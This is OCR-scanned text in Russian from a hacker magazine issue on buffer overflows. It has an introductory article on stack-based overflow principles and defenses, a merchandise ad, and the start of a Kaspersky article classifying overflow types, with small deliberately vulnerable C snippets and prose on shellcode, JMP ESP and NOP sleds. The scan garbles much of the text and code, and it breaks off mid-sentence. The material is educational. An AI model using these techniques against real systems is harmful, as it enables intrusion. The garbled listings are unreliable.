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У каждого из-нае-вежизни когда-то наступает момент, — 
когда хочется вырваться из замкнутого круга повседневнос- 
ти, хочется сделать что-то грандиозное... Перестать покорно 
слушать систему и начать диктовать ей свои правила. В жиз- 
ни каждого начинающего компьютерного исслледователя 
(называй его хакером или еще как угодно - смысла это не ме- 
няет) рано или поздно наступает такой момент, когда пропада- 
ет всякое желание просто брать чужие эксплоиты на давно про- 
патченные баги или платить огромные суммы за 20 строчек кода. 
И тут есть два пути: или ты опускаешь руки, понимая, что это не для 
тебя, или же ты становишься на путь познания истины. Если ты выбрал 
первый вариант, можешь смело закрывать журнал и ближайшие несколь- 
ко лет заниматься обдумыванием того, ради чего ты, собственно, живешь, при 
этом параллельно работая «где-то» и занимаясь «чем-то»... Если же ты выбрал gpy- 
гой путь, будь готов к тому, что тебе придется выложиться по максимуму. Этот путь полон загадок и неве- 
роятных открытий, головоломок и просто бессмысленных терабайт мелочей, которые тебе могут пригодить- 
ся. Все они вместе создают систему, сертификат доступа к узким кругам элиты, ядру компьютерного андег- 
раунда. И чтобы сделать этот путь более легким, мы создали для тебя этот Спец. Мы задали тебе направле- 
ние и сообщили начавьную скорость, но что тебе с ними делать, решай сам... Wake up Neo... 
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МЫЛЬНЫЙ ПУЗЫРЬ 


ПЕРЕПОЛНЕНИЕ БУФЕРА: 
ОСНОВНЫЕ ИДЕИ И ПРИНЦИПЫ 


же много лет компьютерный мир борется с одной из самых сильных атак, 
вызывающих повышение привилегий как локального, так и удаленного 


пользователя, - buffer overflow. 


ля того чтобы понять весь ме- 


ханизм атак на переполнение 


буфера, ты должен кратко оз- 


накомиться с основными 


принципами архитектуры про- 
цессоров х86. Все камни с программной ар- 
хитектурой х86 имеют несколько регистров с 
определенными названиями и значениями. 
Так, например, регистр ЕАХ применяется 
для пользовательских данных, регистр ЕСХ 
используется как счетчик в циклах и повто- 
ряющихся операциях и т.д. Основные регист- 
ры и их назначения были унаследованы от 
286-го процессора, но была расширена раз- 
рядность каждого регистра (go 32 бит) и в 
название добавили букву "Е" (extended, в пе- 
реводе с англ. - расширенный). Кроме базо- 
вых, доступных пользователю регистров, су- 
ществуют так называемые системные регист- 
ры. Запись в них напрямую запрещена, и они 
используются для контроля за выполнением 
программы. Примерами таких регистров мо- 
гут служить ЕВР и ESP, использующиеся в 
операциях со стеком, ЕР, представляющий 
собой указатель на инструкцию, которую 
процессор будет выполнять следующей. И 
еще один регистр, о котором тебе желатель- 
но знать, - регистр флагов EFLAGS, это, по 
сути, 32 бита, которые используются как пе- 
реключатели-сфлаги при работе процессора. 
Так дела обстоят с регистрами в процессо- 
ре, но для понимания термина "buffer over- 
flow" нужно ознакомиться с понятием стека. 


СТЕК И ЕГО СТРОЕНИЕ 

m Стек представляет собой непрерывную 
область памяти, адресация на которую проис- 
ходит с помощью регистров ESP (указатель 
стека) и SS (указатель на сегмент стека). 
Именно в стеке хранится тот загадочный бу- 
qpep, переполнение которого так пугает всех 
разработчиков ПО. Расположение буфера 
внутри стека таит в себе огромную опасность: 
компилятор помещает буфер переменной в 
стек, а до этого, чуть раньше, записывается 
адрес возврата из процедуры. Структуру 
стека можно посмотреть на скрине. 

Но такой расклад несет только полбеды: 
стек работает с данными по принципу "пер- 
вым пришел, последним ушел" (FILO). То 
есть это обычная пирамида: чтобы добраться 
до самого низа, нужно разобрать все строе- 
ние - чтобы взять данные, положенные в 
стек первыми, нужно вынуть всю информа- 
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Старшие адреса 


Адрес передаваемого 


А байта параметра 
4 байта Адрес возрата 
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7 байт 
(зависит от компилятора) 
16 байт Локальный буфер 
фиксированного размера 
7 байт Другие локальные 


перемещения Стек "растет 


сюда 
Младшие адреса 


Переполнение буфера (С). Атака на Internet 


цию из стека. На языке команд процессора 
эти операции носят названия PUSH ("запи- 
хать") и РОР ("достать"). Именно с помощью 
таких операндов происходит вся основная 
работа с содержимым стека. 

Также тебе необходимо знать, что такое бу- 
qpep и почему он располагается в стеке. 

Представим себе простую программу, 
написанную на С, в которой используется пе- 
ременная, объявленная как Char buff[10];, то 
есть переменная buff имеет размер строго в 
10 байт, что явно определено при ее объяв- 
лении. Больше 10 байт данная переменная 
принять не сможет, хотя меньше - пожалуйс- 
та. И программа, имеющая так объявленную 
переменную, будет работать долго и стабиль- 
HO до тех пор, пока в переменную buff будут 
помещаться строки длиной не более 10 сим- 
волов. Но это в идеале и при условии, что 
программа работает в правильных руках ;-). А 
что произойдет, если попытаться присвоить 
переменной buff строку длиной более 10 сим- 
волов? А произойдет самое интересное! 
Представим, что мы откомпилировали прог- 
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РЕГИСТРЫ 


Ш Регистры - это особые ячейки памяти, находящиеся в процессо- 


ре. Скорость работы с ними огромна, поэтому их используют для 
хранения данных, с которыми процессор работает в данный момент. 
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Схема работы стека 


рамму, содержащую такую перемен- 
ную, и начали исследовать ее в от- 
ладчике. Самое главное, на что следу- 
ет обратить внимание, - это на стек и 
на его строение в уязвимой програм- 
ме. На скрине ты можешь увидеть 
схему, составленную на основе анали- 
за информации отладчика. 

Чтобы не было вопросов, постараюсь 
объяснить эту схему как можно под- 
робнее, так как именно в ней заключа- 
ется основная идея атак типа перепол- 
нение Oycpepa. Мы видим, что адрес 
возврата из процедуры, в которой про- 
исходит объявление процедуры buff, 
лежит в одном сегменте с буфером са- 
мой переменной Бий. Что нам это дает? 
На первый взгляд, ничего особенного, 
но если вспомнить, что стек "растет" 
вниз, то есть имеет идеологию FILO, то 
становится очевидной потенциальная 
уязвимость: при попытке записи в пе- 
ременную buff больше 10 байт прои- 
зойдет затирание области памяти, ни- 
как не относящейся к данной перемен- 
ной! Сначала будет затерта область 
служебной информации, а потом, если 
передать достаточно длинную строку, 
произойдет перезапись адреса возвра- 
та из процедуры. Причем в качестве 
адреса возврата будут выступать не 
случайные адреса, а первые несколько 
байт строки, переполнившей буфер. 


А В ЖИЗНИ ВСЕ БЫВАЕТ ТАК 

ш Отличительной чертой таких атак 
является то, что они не имеют привяз- 
ки к какой-либо платформе. Уязви- 
мости этого типа находят и в Виндах, 
ивЛинуксе, и в Фрибса и многих gpy- 
гих. Тебе интересно, как ОС отреаги- 
рует на такую ошибку в программе, 
если она произошла случайно, а не 
под действием эксплоита? Все очень 
просто: *пих-системы при возникнове- 
нии такой критической ситуации вы- 
полнят аварийное завершение прог- 
раммы и выдадут на консоль предуп- 
реждение, аналогичное "Segmen- 
tation fault, core dump" (как говорится, 
упал в кору). Перевод этого высказы- 
вания системы чего-то конкретного не 
даст: ошибка сегментации, кусок па- 
мяти, вызвавший сбой, сохранен на 
винте. Однако появление такого сооб- 
щения вовсе не означает, что прои- 
зошло именно переполнение буфера, 
поэтому говорить о стопроцентной 
ошибке программистов в этих случа- 
ях, по меньшей мере, глупо ;-). Очень 
часто *гиИх-системы "сбрасывают дамп 
в кору" при других ошибках, вовсе не 
связанных с переполнением. Иначе 
дело обстоит в среде мелкомягких. 
При переполнении буфера в Windows 
пользователь получит системное пре- 
дупреждение и аварийную остановку 
программ. Но предупреждение ОС в 
данной системе более информативно: 
"The instruction at "0x31313131" refer- 
enced memory at "Ох31313131". The 
memory could not be read". Kak ви- 
дишь, все достаточно понятно: мы ви- 
дим попытку глючной программы об- 
ратиться к запрещенному адресу па- 
мяти. Почему адрес именно 
0x31313131? Потому что для вызова пе- 
реполнения буфера на вход была по- 
дана строка из 17 символов "А". Дос- 


Самой желанной целью хакера является 
ошибка в сервисе из нулевого кольца. 


ФЛАГИ В ПРОЦЕССОРАХ АРХИТЕКТУРЫ X86 


OF (Overflow Flag - флаг переполнения), 


ZF (Zero Flag - флаг нуля), 


SF (Sign Flag - флаг знака), 

CF (Carry Flag - флаг переноса), 
PF (Parity Flag - флаг четности), 
AF (Auxiliary Carry Flag - дополнительный флаг переноса), 
DF (Direction Flag - флаг направления). 


таточно немного поэкспериментиро- 
вать с найденным переполнением, и 
эксплоит будет создан. В процессе 
изучения такого бага каждый хакер 
должен определить длину строки, ко- 
торая способна эффективно пере- 
полнить буфер в стеке, а также по- 
добрать такой конец этой строки, 
чтобы он ссылался на другую проце- 
дуру, написанную хакером. Обычно с 
первым параметром проблем возни- 
кает немного: во многих программах 
используются стандартные значения 
длин буферов, такие, как 10, 100, 128, 
256, 1000, 1024 и 10000. Другие зна- 
чения - большая редкость, хотя и 
они встречаются, но программист 
обязательно уделит немалое внима- 
ние защите такого большого буде- 
ра, так как в него будет передавать- 
ся массив данных, который при неп- 
равильном копировании повесит всю 
программу в один момент. Несколько 
сложнее дело обстоит с выбором 
последних байт строки. Они будут 
представлять собой адрес возврата, 
и на каждый случай переполнения 
приходится подбирать новую строку. 
Перед тем как я объясню, что же это 
за адрес, ты должен понять, какую 
"магическую" силу несут эти нес- 
колько байт. 


ГДЕ ИСПОЛЬЗУЕТСЯ 
ПЕРЕПОЛНЕНИЕ БУФЕРА 

и Найти ошибку переполнения - 
это только часть работы хакера. Ос- 
новная же задача - написать к ней 
эксплоит. Обычно эксплоиты ис- 
пользуют переполнение буфера в 
привилегированных программах, 
что в рамках архитектур означает 
следующее. Windows-nporpamma за- 
пускается с правами "System" или 
работает в нулевом кольце защиты. 
Нулевое кольцо защиты - это режим 
максимальных привилегий процес- 
сора; ПО, которое там работает, - яд- 
ро операционной системы в Виндах, 
некоторые антивирусы, из-за чего 
они страшно глючат (подробнее о 
нулевом кольце защиты читай в 
других статьях этого номера). Ко- 
нечно, самой желанной целью хаке- 
ра является ошибка в сервисе из 
нулевого кольца, ведь эти програм- 
мы работают с правами "System", 
что гораздо выше стандартного 
"Администраторы". 

В системах *nix все аналогично, за 
исключением того что ядро работает 
не в ringO. Стараются найти програм- 
му, имеющую такую ошибку и при 
этом работающую с высокими приви- 
легиями, например, запущенную от 
гоо[-пользователя. Или еще один ва- 
риант - баги в программах, у которых 
установлен бит SUID/SGID, а сами 
файлы принадлежат root'y. Именно 
таких программ очень много, и часто 
они приводят к взлому *nix. Как ви- 
дишь, у систем отличаются только це- 
ли атаки, а сами атаки проходят по од- 
ному и тому же принципу. 


» 


Стек имеет 
идеологию 
FILO, что 
позволяет 
проводить 
атаки типа 
переполне- 
ние буфера. 


Достаточно 
правильно 
рассчитать 
адрес возв- 
рата и уз- 
нать длину 
строки, спо- 
собную эф- 
фективно 
перепол- 
нить буфер, 
и уязви- 
мость будет 
заюзана. 
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ЛОПНУТЬ КАК МЫЛЬНЫЙ ПУЗЫРЬ ») 


buffer overflows 


Горим! :-) 


КАК ИСПОЛЬЗУЮТСЯ 
БРЕШИ В ПО? 

m= Мы продолжаем наше исследова- 
ние атак переполнения буфера. Nog- 
мена адреса возврата в привилегиро- 
ванной программе является следстви- 
ем удачного переполнения буфера. 
Обычно новый адрес содержит ссыл- 
ку на функцию, которая вызывает ко- 
мандный интерпретатор (shell) систе- 
мы с высокими привилегиями. Для 
Виндов вызывается на выполнение 
всем известная ста, а для *nix - 
/bin/sh. На этом работа эксплоита за- 
кончена, ошибка переполнения буфе- 
ра была использована. Дальнейшие 
действия, как атакующего, так и сис- 
темы, уже не имеют отношения к на- 
шей теме. 


ТЕОРИЯ АТАКИ 

m Переполнение буфера - одна из 
самых критических ошибок в ПО. Хотя 
она полностью изучена и документи- 
рована, багтрак-сайты снова и снова 
пестрят сообщениями об очередном 
buffer overflow. А причина устойчи- 
вости этой уязвимости кроется в са- 
мой архитектуре системы. Можно сме- 
ло говорить о большой вероятности 
переполнения буфера, если система 
обладает следующими параметрами: 

и адрес возврата из функции поме- 
щается в стек (абсолютно все распро- 
страненные ОС и компиляторы); 

ш параметры функции передаются 
через стек (все OC, а gna Windows 
это - основной способ передачи пара- 
метров в АР|-функции); 

ш локальные переменные лежат в 
стеке (Windows- и *гих-компиляторы 
делают именно так); 

и стек имеет идеологию FILO (так 
устроена платформа х86, а значит 
все системы, работающие на данной 
архитектуре, имеют такой тип стека); 

и данные стека могут быть команда- 
ми (одна из основ архитектуры х86 - 
единое адресное пространство для 
данных и кода); 

и имеются процессы с высокими 
привилегиями (справедливо для лю- 
бой ОС; одна из основ разграничения 
пользователей, базис сетевых ОС); 

ш в программах используются функ- 
ции с ошибками ;-) (человеческий 
фактор, срабатывает постоянно, и на- 
ходят все больше и больше бажных 
прог). 

Видишь, как все сложно? Перепол- 
нение бусфера - это ошибка, от кото- 
рой избавиться крайне трудно, пото- 
му что главная причина кроется в ос- 
новах архитектуры х86 и в базисах 
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разработки ОС. Ни то ни другое пере- 
делать никто уже не сможет. 

Теперь, когда ты, надеюсь, понял 
технологию таких атак, поговорим о 
практической стороне данного вопро- 
са, ведь, как известно, теория без 
практики мертва. 


СПОСОБЫ ЗАЩИТЫ 

и Учитывая, что основа атак такого 
типа кроется в самой идеологии архи- 
тектуры х86, легко реализуемые за- 
щиты отпадают сразу :-(. На данный 
момент основным способом защиты 
является поиск и устранение челове- 
ческих ошибок как в ПО, так и в ком- 
пиляторах. Ничего принципиально 
другого пока не придумали. Хотя 
перспективные разработки имели 
место: несколько лет назад был выпу- 
щен патч на ядро Linux, который зап- 
рещал выполнять код в стеке, лишая 
атаку одного из ключевых моментов. 
Однако проект этот скоро загнулся по 
причине серьезного увлечения неста- 
бильностью системы в целом. Сейчас 
мы видим новые попытки реализо- 
вать идею запрета выполнения кода 
из области данных. В начале этого го- 
да представители AMD заявили: "Про- 
цессоры Opteron и Athlon 64 способ- 
ны защитить компьютер от интернет- 
атак одного из самых распространен- 
ных типов - совершаемых путем вызо- 
ва ошибки переполнения буфера. Как 
и почти все другие, процессоры AMD 
при переполнении буфера передают 
управление механизму обработки иск- 
лючений. Но благодаря функции 
Execution Protection после этого 
Opteron и Athlon 64 принимакт go- 
полнительные меры: код, поступаю- 
щий после вызова исключения по пе- 
реполнению буфера, попросту не за- 
писывается в память и не исполняет- 
ся, за счет чего блокируется деятель- 
ность троянских программ, вызываю- 
щих переполнение буфера в целях 
подчинения себе системы". То есть 
они правят архитектуру х86 на аппа- 
ратном уровне ;-). Есть приятные но- 
вости и oT Intel. Совсем недавно одфи- 
циально объявлено о том, что начи- 
ная с процессора Prescott в степинг 
ЕО будет добавлен новый сфлаг NX, 


МЫСЛЯ 


запрещающий выполнение кода в 
стеке на аппаратном уровне. Как ви- 
дим, уничтожается теоретическая ос- 
нова атак на переполнения буфера, 
причем борются с этой ошибкой архи- 
тектуры сами производители железа. 
Но на сегодняшний день такой метод 
борьбы неэфоективен: для Windows 
ХР поддержка сфлага МХ будет введе- 
на только в SP2, для остальных вер- 
сий она вообще пока не предвидится, 
для Linux описание патчей уже дос- 
тупно по адресу redhat.com/~mingo/nx- 
patches/QuickStart-NX.txt. Но отсутствие 
программной поддержки - не самое 
решающее препятствие в распростра- 
нении такой защиты, главным являет- 
ся то, что ни один общедоступный 
процессор не имеет такого срлага! 
Для процессоров АМВ первый камень 
с такой защитой - 64-битный Athlon. A 
у Intel пока все в проектах: нет ни OG- 
ного CPU с такой аппаратной защи- 
той, ее обещают лишь в 64-битных 
реализациях и в Р-\ нового степинга. 


ПРОГРАММИСТЫ РЕШАЮТ 
СВОИ ПРОБЛЕМЫ САМИ 

m Не только производители процес- 
соров озабочены проблемой перепол- 
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Копируя в буфер, мы можем его 
переполнить 


Ш "Выходит, что переполнение буфера - изъян архитектуры х86?" - 


спросишь ты. 
"Да, отчасти виновата в возможности такой атаки архитектура х86",- 
отвечу я ;-). 
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нения Oycpepa, но и программисты ищут выход из создав- 
шегося положения. Один из действенных методов предла- 
гает нам сайт www.trl.ibm.com/projects/security/ssp. Метод прост и 
эффективен: исходный код программы подвергается авто- 
матическому анализу плагином ССС (который и предлагают 
нам разработчики защиты), и при нахождении потенциаль- 
но опасного участка кода происходит его автоматическая 
модификация таким образом, что вероятность переполне- 
ния буфера сводится к минимуму. Пример такой обработки 
показан в двух следующих листингах. 


/* 1. листинг программы go обработки: /* 
#include <stdio.h> 
int main() 


нты предс яют собой "0" */ 
: "); /*По МЫСЛу программиста, 


а значит и вводить больше 


ть больше 20 


от эта 


вводимых 


ункция несет всю опасность. Она не 


аэ\/ OT 


разу откры 


После того как отработает 9сс с установленным плагином, 
можно предположить, анализируя ассемблерный код, та- 
кой вариант листинга (точно сказать невозможно, так как 
он его просто откомпилирует): 


/* 2. примерный листинг после обработки gcc /* 
#include <stdio.h> 


int main() 


‚ра сохраняется*/ 


и) 


ервы‹ 
а при некорректном пользовательском вводе.*/ 


Аналогично происходит замена функций strcpy(), $гстро 
и рип О на strncpy(), strncmp() и snprint(). Кроме этого, ис- 
пользуются некоторые другие алгоритмы защиты от типич- 
ных атак переполнения буфера. 


подводя итоги 

и Ошибки программистов в обработке данных програм- 
мой очень часто встают в огромные финансовые потери 
компаниям и организациям. И хотя уже шестнадцать лет 
назад вирус Морриса открыл эпоху ошибок переполнения 
буфера, эта проблема еще очень далека от решения. Пос- 
тоянны сообщения о новых и новых уязвимостях. Но мир 
не стоит на месте! И есть надежда на то, что новые техно- 
логии AMD, Intel и разработки программистов смогут испра- 
вить не только ошибку переполнения, но и архитектуру, 


породившую ее. 
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Футболка "Crack me" с логотипом Куртка - ветровка "FBI" с логотипом 
"Хакер" темно-синяя, серая "Хакер" черная, темно-синяя 


ad 


Футболка "Kill Bill Gates" Кожаный шнурок для мобильного 
с логотипом "Хакер" желтая, черная телефона "Хакер" 
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Футболка "Хакер Inside" Кружка "Matrix" с логотипом "Хакер" 
с логотипом "Хакер", красная черная 


ee 
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Коврик для мыши "Опасно для жизни" 
с логотипом журнала "Хакер" 
(черный) 


Зажигалка металлическая с 
гравировкой с логотипом журнала 
"Хакер" 
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ЗАКАЗЫ ПО ИНТЕРНЕТУ — КРУГЛОСУТОЧНО! 
ЗАКАЗЫ ПО ТЕЛЕФОНАМ: 


(095) 928-6089 (095) 928-0360 (095) 928-3574 


Я ХОЧУ ПОЛУЧАТЬ 
И БЕСПЛАТНЫЙ КАТАЛОГ 
a IneEe № ТОВАРОВ В СТИЛЕ X 

ИНДЕКС ГОРОД. 

УЛИЦА ДОМ. КОРПУС. КВАРТИРА 


ФИО 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 
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ЗООПАРК ПЕРЕПОЛНЯЮЩИХСЯ BYDEPOB ») 


Крис Касперски aka мыщьх 


ЗООПАРК 
ПЕРЕПОЛНЯЮЩИХСЯ 
БУФЕРОВ 


КЛАССИФИКАЦИЯ УЯЗВИМОСТЕЙ ТИПА BUFFER OVERFLOW 


то не воспаленная 


фантазия обкуренного 


срантаста. Это посте- 


Из инстру- 
ментов по- 
надобятся 
компилятор, 
отладчик, 
дизассемб- 
лер и любой 
НЕХ-редак- 
тор по вку- 
су, а также 
принтер, 
пиво и ост- 
ро заточен- 
ный каран- 
даш. 


Подавляю- 
щее боль- 
LUMHCTBO 
удаленных 
атак осуще- 
ствляется 
путем пере- 
полнения 
буфера, 
частным 
случаем ко- 
торого яв- 
ляется пе- 
реполнение 
(срыв) сте- 
ка. 


пенно становится pe- 

альностью. Дизассемб- 
лирование в ряде стран уже запреще- 
но. Публичное описание технических 
деталей хакерских атак и уязвимостей 
на пороге запрета. 

Однако мощные мегакорпорации 
еще чрезвычайно уязвимы. Их прог- 
раммное обеспечение дыряво до не- 
возможности, и чем больше заплат 
накладывается на продукт, тем ypog- 
ливее и неустойчивее он становится. 
Что мешает нам этим воспользовать- 
ся? Ударим же хакерским автопробе- 
гом по виртуальному бездорожью! 


ТИПЫ ПЕРЕПОЛНЕНИЙ 

m Существуют различные типы пе- 
реполнений. Самое известное из них - 
последовательное переполнение при 
записи, которое возникает обычно 
при небрежном обращении с функци- 
ями копирования памяти (memcpy, 
memmove, strcpy, strcat, sprintf u gpy- 
гими, статистика "переполняемости" 
которых изображена на диаграмме), 
"проламывающими" дно буфера и пе- 
резаписывающими одну или несколь- 
ко ячеек памяти за его концом. Менее 
популярно индексное переполнение, 
тесно связанное с сишными "недо- 
массивами" и проблемой контроля их 
границ. Рассмотрим следующий код: 
f(int i) {char buf[BUF_SIZE]; ... return 
Би}. Очевидно, что, если i >= 
BUF_SIZE, функция f возвращает со- 
держимое ячеек, совсем не принадле- 
жащих массиву buf. 

Таким образом, основных типов пе- 
реполнения четыре: последователь- 
ное переполнение при чтении, после- 
довательное переполнение при запи- 
си, индексное переполнение при чте- 
нии, индексное переполнение при за- 
писи. Наивысшую опасность предс- 
тавляют перезаписывающие перепол- 
нения, при благоприятном стечении 
обстоятельств передающие атакую- 
щему контрольный пакет акций уда- 
ленного управления уязвимой маши- 
ной. Многие считают, что переполне- 
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ния при чтении менее опасны и при- 
водят, в основном, лишь к утечке сек- 
ретной информации (например, паро- 
лей). Однако, это неверно: даже впол- 
не безобидные на вид переполнения 
способны порождать каскад вторич- 
ных переполнений, пускающий систе- 
му в разнос и зачастую успевающий 
перед смертью сделать что-то полез- 
ное для хакера, особенно если этот 
разнос осуществляется по заранее 
продуманному плану. 

В зависимости от типа перезаписы- 
ваемых переменных различают, по 
меньшей мере, три вида атак: атаки на 
скалярные переменные, атаки на ин- 
дексы (указатели) и атаки на Oycpepa. 
Скалярные переменные часто хранят 
флаги авторизации пользователей, 
уровни привилегий, счетчики циклов 
и прочее. 


КОД #1. АТАКА HA 
СЧЕТЧИК ЦИКЛА 


f(char *dst, char *src) 
{ 
char buf[xxx]; int a; int b; 


b= strlen(src); 


for (a = 0; a <b; а++) *dst++ = *srct+ 
} 


Если переполнение буфера buf прои- 
зойдет после вызова strlen, переменная 
b будет жестоко затерта и наш цикл вы- 
летит далеко на пределы src и dst! 


КОД #2. АТАКА HA 
ПЕРЕМЕННУЮ-ФЛАГ 


f(char *psswd) 


{ 
char Би МАХ_ВИЕ_$17Е]; int auth_flag = 


PASSWORD_NEEDED; 

printf("ckaku naponb:"); gets(buf); 
if (auth_flag != PASSWORD_NEEDED) 
return PASSWORD_OK; 

return strcmp(passwd, buf); 

} 


Атака на указатели может Npecnego- 
вать три цели: а) передачу управле- 
ния на посторонний код (аналог 
CALL); 6) модификацию произволь- 
ной ячейки (аналог РОКЕ); в) чтение 
произвольной ячейки (аналог PEEK). 

Начнем с атаки, имеющей целью пе- 
редачу управления, как наиболее 
мощной и разрушительной. Она де- 
лится на два подтипа: 

1) передача управления на функцию, 
уже существующую в программе; 

Il) передача управления на код, 
софрормированный самим злоумыш- 
ленником ($Пе!-код). 

Проще всего кинуть ветку управле- 
ния на уже существующую функцию. 
Это можно сделать, например, так (см. 
код #3). Зная адрес функции root (а 
его можно выяснить дизассемблиро- 
ванием), будет нетрудно перезапи- 
сать указатель 7277 так, чтобы при вы- 
зове функции НП управление полу- 
yan root! Естественно, передавать yn- 
равление Ha начало функции необя- 
зательно - "полезный" (для хакера) 
код может располагаться и в ее сере- 
дине (можно, например, пропустить 
процедуру аутентификации и сразу 
запрыгнуть в центральный штаб). Оп- 
ределенная проблема возникает с 
инициализацией регистров и переда- 
чей параметров, однако всегда можно 
подобрать функцию, не принимаю- 
щую никаких параметров, или пере- 
дать их косвенным образом. 

Где можно найти указатели на код? 
Прежде всего, это адрес возврата, 
расположенный внизу кадра стека, 
затем идут виртуальные таблицы и 
указатели this, без которых не обхо- 
дится ни одна программа Си++, указа- 
тели на функции динамически загру- 
жаемых библиотек 
(LoadLibrary/GetProcAddress) также 
не редкость, ну и другие типы указа- 
телей тоже встречаются. 

Shell-kog - намного более мощная 
штука, позволяющая вытворять с уяз- 
вимой программой что угодно. В плане 
возращения к коду #3 спросим себя: а 
что произойдет, если в переменную 
727 занести указатель на сам перепол- 
няющийся буфер buf, B который внед- 


КОД #3. АТАКА HA 
КОДОВЫЕ УКАЗАТЕЛИ 


root() {...}; 


f() 
{ 


char buf[MAX_BUF_SIZE]; int (*777)(); 
222 = GetProcAddress(dllbase, "fh" 
gets(but); 


7721); 


} 


рить хакерский код, организующий 
нам удаленный shell? Эта классичес- 
кая схема атаки, описанная практичес- 
ки во всех драках и мануалах по безо- 
пасности, в действительности полная 
фигня. При практической реализации 
атаки сталкиваешься с таким количе- 
ством проблем, что чувствуешь себя 
верблюдом, попавшим на хавчик. Ин- 
тересующихся мы отошлем к статье 
"Ошибки переполнения буфера извне 
и изнутри как обобщенный опыт ре- 
альных атак" на Wasm.ru, а сами пе- 
рейдем к указателям на данные. 

Указатели на данные гораздо более 
распространены и коварны. Рассмот- 
рим простейший пример (см. код #4). 
Если перезаписать указатель Ь вместе 
со скалярной переменной а, то мы по- 
лучим своеобразный аналог бейсик- 
срункции РОКЕ, с помощью которой 
можно модифицировать любую ячей- 
ку программы (и указатели на код в 
том числе). Это самое мощное оружие, 
которое только существует в кибер- 
пространстве! 


КОД #4. АТАКА ТИПА 
"РОКЕ" 


f() 
{ 
char buf[MAX_BUF_SIZE]; int a; int *b; 


gets(buf); 


Правда, его мощь будет неполной 
без функции РЕЕК, позволяющей чи- 
тать произвольные ячейки, так как за- 
частую целевой адрес записи не из- 
вестен, и, чтобы не блуждать впоть- 
мах, неплохо бы увидеть "живой" 
дамп уязвимой программы. 

Индексы представляют собой разно- 
видность указателей. Можно сказать, 
что это относительные указатели, от- 
считываемые от определенной"базы", 
которой, как правило, является нача- 
ло переполняющегося буфера. 

Рассмотрим следующий пример и 
сравним его с кодом #4, чтобы выяс- 
нить, есть ли между ними разница. 
При вычислении эффективного agpe- 
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КОД #5. АТАКА ТИПА 
"РЕЕК" 


f() 
{ 
char buf[MAX_BUF_SIZE]; int *b; 


gets(but); 


printf("%x\n", *b); 
} 


ca Си просто складывает указатель с 
индексом: addr = (p+b). Варьируя b, мы 
можем получить любой addr, и р нам 
не помешает. Правда, тут есть одно 
но. Сказанное справедливо лишь по 
отношению к индексам типа двойного 
слова, а дальнобойность байтовых 
индексов очень даже ограничена! 


КОД #6. АТАКА HA 
ИНДЕКСЫ 


f() 

tl 

int *p; char buf[MAX_BUF_SIZE]; int a; int 
b; 


gets(buf): 


OT индексов рукой подать go цело- 
численного переполнения, суть кото- 
рого можно понять из следующего 
примера: 


КОД #7. 
ЦЕЛОЧИСЛЕННОЕ 
ПЕРЕПОЛНЕНИЕ 


DWORD sum(DWORD а, DWORD b) 


{ 
return a + b; 
} 


Если сумма a и Б равна или превы- 
шает 1.00.00.00.00h, то произойдет 
переполнение разрядной сетки и ре- 
зультат вычислений окажется усечен. 


Со знаковыми переменными еще ин- 
тереснее: сумма двух положительных 
чисел зачастую оказывается меньше 
нуля (достаточно лишь затереть стар- 
ший бит - на архитектуре х86 он и 
есть знаковый). Вычисления с преоб- 
разованием типа - вообще полный 
швах: а = (DWORD) (byte b - byte с). Ec- 
ли b ‹ с, то небольшое по модулю от- 
рицательное число превратится в 
очень большое положительное, и ес- 
ли оно используется в индексном вы- 
ражении, а проверки выхода за грани- 
цы массива отсутствуют - произойдет 
его катастрофическое переполнение 
(на этом, кстати говоря, и была основа 
легендарная атака teardrop). 
Остальные типы переполнений чрез- 
вычайно мало распространены, и поэ- 
тому мы не будем их рассматривать. 


ТРИ КОНТИНЕНТА: СТЕК, 
ДАННЫЕ И КУЧА 

m Переполняющиеся буфера могут 
располагаться в одном из трех мест ag- 
ресного пространства процесса: стеке 
(автоматической памяти), сегменте дан- 
ных (хотя в 9х/МТ это никакой не сег- 
мент) и куче (динамической памяти). 

Наиболее распространено стековое 
переполнение, хотя его значимость 
сильно преувеличена. Дно стека 
варьируется от одной операционной 
системы к другой, а высота вершины 
зависит от характера предыдущих 
запросов к программе, поэтому абсо- 
лютный адрес автоматических пере- 
менных атакующему практически ни- 
когда не известен. С другой стороны, 
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ЗООПАРК ПЕРЕПОЛНЯЮЩИХСЯ БУФЕРОВ +) 


автоматические буфера привлека- 
тельны тем, что в непосредственной 
близости с их концом лежит адрес 
возврата из функции (абсолютный, 
конечно), и если его затереть, то уп- 
равление получит совсем другая вет- 
ка программы! Проще всего подсу- 
нуть адрес уже существующей функ- 
ции, сложнее - передать управление 
непосредственно на сам переполняю- 
щийся буфер. Это можно сделать нес- 
колькими путями. Первый - найти в 
памяти инструкцию МР ESP и пере- 
дать ей управление, а она передаст 
его на вершину Kapga стека, чуть ниже 
которого расположен shell-Kog. Шансы 
дойти go shell-koga, преодолев весь 
мусор на дороге, достаточно невелики, 
но они все-таки есть. Второй путь: ес- 
ли размеры переполняющегося буфре- 
ра превышают непостоянство его раз- 
мещения в памяти, перед shell-Kogom 
можно расположить длинную цепочку 
команд-пустышек (NOP'oB) и передать 
управление на середину (авось не 
промажет!). Этот способ использовал 
червь Love San, известный тем, что ча- 
ще всего он мазал и ронял машину, не 
производя заражения. И, наконец, тре- 
тий вариант: если атакующий может 
воздействовать на статические буфе- 
ра, расположенные в сегменте данных 
(а их адрес постоянен), то передать 
сюда управление не составит труда. 
Ведь $Пе!-код и не подписывался рас- 
полагаться именно в переполняющем- 
ся буфере - он может быть где угодно. 
Правда, не факт, что при переполне- 
нии буфера сункция доживет до воз- 
вращения, ведь все располагающиеся 
за его концом переменные окажутся 
искажены! Кстати говоря, помимо ag- 
реса возврата там гнездятся полчища 
прочих служебных структур, но рас- 
сказать о них в рамках журнальной 
статьи нет никакой возможности. 

С кучей все обстоит значительно 
сложнее. Не углубляясь в технические 
детали реализации менеджера дина- 
мической памяти, можно сказать, что с 
каждым блоком выделенной памяти 
связано, по меньшей мере, две слу- 
жебных переменных: указатель (ин- 
декс) на следующий блок и cpnar заня- 
тости блока, расположенные либо пе- 
ред выделяемым блоком, либо после 
него, либо вообще в другом месте. При 
освобождении блока памяти сункция 
free проверяет сфлаг занятости следу- 
ющего блока и, если он свободен, сли- 
вает оба блока воедино, обновляя 
"наш" указатель. А где указатель, там 
практически всегда есть и РОКЕ. То 
есть, затирая данные за концом выде- 
ленного блока строго дозированным 
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Устройство блоков динамической памяти (все подписи соответствуют одноименным по- 
